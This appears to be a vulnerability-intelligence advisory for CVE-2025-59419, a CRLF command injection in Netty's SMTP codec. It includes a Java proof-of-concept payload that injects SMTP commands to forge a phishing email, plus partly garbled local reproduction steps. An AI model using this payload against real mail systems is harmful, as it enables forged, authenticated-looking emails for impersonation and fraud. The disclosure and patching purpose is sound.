CVE-2025-59419 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Lower probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.
The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters.
The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.
Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client.
A minimal PoC involves passing a crafted string containing CRLF sequences to any SmtpRequest that accepts user-controlled parameters.
1. Malicious Payload
The core of the exploit is the payload, where new SMTP commands are injected into a parameter.
// The legitimate recipient is followed by an injected email sequence
String injected_recipient = "[email protected]\r\n" +
"MAIL FROM:<[email protected]>\r\n" +
"RCPT TO:<[email protected]>\r\n" +
"DATA\r\n" +
"From: [email protected]\r\n" +
"To: [email protected]\r\n" +
"Subject: Urgent: Phishing Email\r\n" +
"\r\n" +
"This is a forged email that will pass authentication checks.\r\n" +
".\r\n" +
"QUIT\r\n";
2. Triggering the Vulnerability
The vulnerability is triggered when this payload is used to create an SMTP request.
// The Netty SMTP codec will fail to sanitize this input
SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);
// When this request is sent to an SMTP server, the injected commands
// will be executed, sending a forged email.
channel.writeAndFlush(maliciousRequest);
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
3. Full Reproduction Steps
A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server
To run the full PoC:
brew install mailhog && mailhogdocker run -p 1025:1025 -p 8025:8025 mailhog/mailhoglocalhost:1025 and send the malicious payload.http://localhost:8025. You will see the forged email sent to [email protected] from [email protected].This is a SMTP Command Injection vulnerability. It impacts any application using netty-codec-smtp to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., from, recipient, helo hostname).
The primary impacts are: